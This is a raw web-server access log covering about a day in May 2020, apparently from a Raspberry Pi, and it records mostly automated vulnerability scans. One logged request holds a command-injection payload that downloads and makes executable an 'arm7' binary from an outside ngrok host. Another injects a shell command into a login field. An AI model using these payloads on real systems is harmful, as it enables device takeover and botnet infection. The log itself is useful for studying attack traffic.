Mon May 4 06:25:06 MDT 2020 06:25:06 up 69 days, 10:53, 1 user, load average: 0.48, 0.34, 0.30 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 69days 1:24m 2.65s /usr/bin/lxsession -s LXDE-pi -e LXDE 91.191.207.83 - - [04/May/2020:14:00:42 +0000] "GET / HTTP/1.1" 400 0 "" "" 172.105.89.161 - - [04/May/2020:14:18:15 +0000] "GET /0bef HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36" 189.177.251.237 - - [04/May/2020:14:44:53 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 189.177.251.237 - - [04/May/2020:14:45:52 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 189.177.251.237 - - [04/May/2020:14:46:07 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 189.177.251.237 - - [04/May/2020:14:46:12 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 66.240.236.119 - - [04/May/2020:17:02:25 +0000] "UNKNOWN HTTP/0.9" 400 0 "" "" 195.54.160.77 - - [04/May/2020:17:50:56 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 195.54.160.77 - - [04/May/2020:17:50:56 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 195.54.160.77 - - [04/May/2020:17:50:56 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 101.91.205.181 - - [04/May/2020:18:28:57 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.243.136.125 - - [04/May/2020:18:47:55 +0000] "GET /manager/html HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 185.216.140.146 - - [04/May/2020:18:57:11 +0000] "GET /000000000000.cfg HTTP/1.1" 404 0 "" "Polycom/5.4.0.14560 PolycomVVX-VVX_410-UA/5.4.0.14560" 85.98.249.90 - - [04/May/2020:19:29:49 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 162.250.19.7 - - [04/May/2020:20:15:33 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" 162.250.19.7 - - [04/May/2020:20:15:34 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko" 162.250.19.7 - - [04/May/2020:20:15:55 +0000] "GET /ac0xl/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" 162.250.19.7 - - [04/May/2020:20:16:08 +0000] "GET /ac0xl/logs/ HTTP/1.1" 200 25000 "http://162.250.19.7/ac0xl/" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" 162.250.19.7 - - [04/May/2020:20:16:26 +0000] "GET /ac0xl/logs/2020.04.28 HTTP/1.1" 200 7413 "http://162.250.19.7/ac0xl/logs/" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" 162.250.19.7 - - [04/May/2020:20:16:37 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 139.162.106.181 - - [04/May/2020:20:39:03 +0000] "GET / HTTP/1.1" 200 25000 "" "HTTP Banner Detection (https://security.ipip.net)" 162.250.19.7 - - [04/May/2020:20:55:33 +0000] "GET /ac0xl/logs/ HTTP/1.1" 200 25000 "http://162.250.19.7/ac0xl/" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" 162.250.19.7 - - [04/May/2020:20:55:43 +0000] "GET /ac0xl/logs/2020.05.04 HTTP/1.1" 200 10299 "http://162.250.19.7/ac0xl/logs/" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" 162.250.19.7 - - [04/May/2020:20:55:51 +0000] "GET /ac0xl/logs/2020.05.04 HTTP/1.1" 200 10299 "http://162.250.19.7/ac0xl/logs/" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" 162.250.19.7 - - [04/May/2020:20:56:42 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 162.250.19.7 - - [04/May/2020:20:56:42 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 162.250.19.7 - - [04/May/2020:21:02:19 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" 162.250.19.7 - - [04/May/2020:21:03:22 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 162.250.19.7 - - [04/May/2020:21:04:50 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0" 162.250.19.7 - - [04/May/2020:21:04:51 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0" 162.250.19.7 - - [04/May/2020:21:05:02 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 58.240.173.166 - - [04/May/2020:21:32:08 +0000] "GET /console HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 58.240.173.166 - - [04/May/2020:21:32:12 +0000] "GET /cgi-bin/test-cgi HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 58.240.173.166 - - [04/May/2020:21:32:15 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 58.240.173.166 - - [04/May/2020:21:32:19 +0000] "GET /horde/imp/test.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 58.240.173.166 - - [04/May/2020:21:32:22 +0000] "GET /login.action HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 58.240.173.166 - - [04/May/2020:21:32:26 +0000] "GET /login?from=0.000000 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 58.240.173.166 - - [04/May/2020:21:32:29 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 58.240.173.166 - - [04/May/2020:21:32:33 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 58.240.173.166 - - [04/May/2020:21:32:36 +0000] "GET /login/do_login HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 79.8.100.126 - - [04/May/2020:22:41:43 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" "" 79.8.100.126 - - [04/May/2020:22:41:43 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 64.227.68.47 - - [04/May/2020:23:09:53 +0000] "GET /news.php?type=0&time=03:48:44 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Linux; Android 6.0.1; CPH1607 Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/63.0.3239.111 Mobile Safari/537.36" 191.98.230.86 - - [04/May/2020:23:33:38 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 168.121.65.180 - - [04/May/2020:23:38:23 +0000] "GET / HTTP/1.1" 400 0 "" "" 106.75.9.231 - - [05/May/2020:01:00:28 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 106.75.9.231 - - [05/May/2020:01:00:34 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.75.9.231 - - [05/May/2020:01:00:34 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.75.9.231 - - [05/May/2020:01:00:35 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.75.9.231 - - [05/May/2020:01:00:36 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.75.9.231 - - [05/May/2020:01:00:36 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.75.9.231 - - [05/May/2020:01:00:37 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.75.9.231 - - [05/May/2020:01:00:38 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.75.9.231 - - [05/May/2020:01:00:38 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.75.9.231 - - [05/May/2020:01:00:39 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 3.0.209.206 - - [05/May/2020:02:00:15 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0" 106.13.22.246 - - [05/May/2020:02:28:15 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.13.22.246 - - [05/May/2020:02:28:17 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.13.22.246 - - [05/May/2020:02:28:18 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.13.22.246 - - [05/May/2020:02:28:19 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.13.22.246 - - [05/May/2020:02:28:21 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.13.22.246 - - [05/May/2020:02:28:22 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.13.22.246 - - [05/May/2020:02:28:23 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 106.13.22.246 - - [05/May/2020:02:28:24 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.13.22.246 - - [05/May/2020:02:28:25 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.13.22.246 - - [05/May/2020:02:28:26 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 68.71.66.207 - - [05/May/2020:02:36:45 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC" 68.71.66.207 - - [05/May/2020:02:36:45 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 5.234.241.111 - - [05/May/2020:02:46:58 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 185.40.4.112 - - [05/May/2020:02:57:46 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0" 190.122.157.61 - - [05/May/2020:02:59:09 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 92.118.37.64 - - [05/May/2020:02:59:49 +0000] "GET / HTTP/1.0" 200 25000 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/75.0.3770.100 Safari/537.36" 80.82.68.73 - - [05/May/2020:03:06:45 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 80.82.68.73 - - [05/May/2020:03:06:46 +0000] "GET /robots.txt HTTP/1.1" 200 70 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 80.82.68.73 - - [05/May/2020:03:06:48 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 193.118.53.194 - - [05/May/2020:03:22:34 +0000] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 " 45.5.7.55 - - [05/May/2020:03:59:13 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 187.148.228.137 - - [05/May/2020:04:00:42 +0000] "GET / HTTP/1.1" 400 0 "" "" 159.203.15.10 - - [05/May/2020:04:15:07 +0000] "GET /index.php HTTP/1.1" 404 0 "" "" 45.14.151.246 - - [05/May/2020:04:37:47 +0000] "GET /pass HTTP/1.1" 404 0 "" "Go-http-client/1.1" 45.14.151.246 - - [05/May/2020:04:37:47 +0000] "GET /pass HTTP/1.1" 404 0 "" "Go-http-client/1.1" 114.113.112.92 - - [05/May/2020:04:38:02 +0000] "GET /manager/html HTTP/1.1" 404 0 "" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)" 108.24.86.100 - - [05/May/2020:05:25:04 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 13.52.237.184 - - [05/May/2020:05:34:13 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" 159.65.121.162 - - [05/May/2020:05:50:44 +0000] "GET /stager32 HTTP/1.1" 404 0 "" "Project25499 Scanner (opt-out@project25499.com)" 159.65.121.162 - - [05/May/2020:05:50:44 +0000] "GET /stager64 HTTP/1.1" 404 0 "" "Project25499 Scanner (opt-out@project25499.com)" 51.158.28.134 - - [05/May/2020:06:04:38 +0000] "GET / HTTP/1.1" 200 25000 "" "" 60.12.94.186 - - [05/May/2020:06:26:22 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.243.144.96 - - [05/May/2020:06:49:13 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 196.52.43.111 - - [05/May/2020:07:29:33 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3602.2 Safari/537.36" 172.104.108.109 - - [05/May/2020:08:18:46 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0" 178.93.13.157 - - [05/May/2020:09:55:41 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 162.243.138.132 - - [05/May/2020:10:01:03 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 128.199.90.14 - - [05/May/2020:10:19:32 +0000] "POST / HTTP/1.1" 501 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.99" 154.126.79.223 - - [05/May/2020:10:34:44 +0000] "GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1" 404 0 "" "Mozilla/5.0" 154.126.79.223 - - [05/May/2020:10:34:47 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 92.118.160.49 - - [05/May/2020:11:29:54 +0000] "GET / HTTP/1.0" 200 25000 "" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" 118.127.106.73 - - [05/May/2020:11:40:54 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" Tue May 5 06:25:07 MDT 2020 06:25:07 up 70 days, 10:53, 1 user, load average: 0.56, 0.30, 0.28 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 70days 1:25m 2.81s /usr/bin/lxsession -s LXDE-pi -e LXDE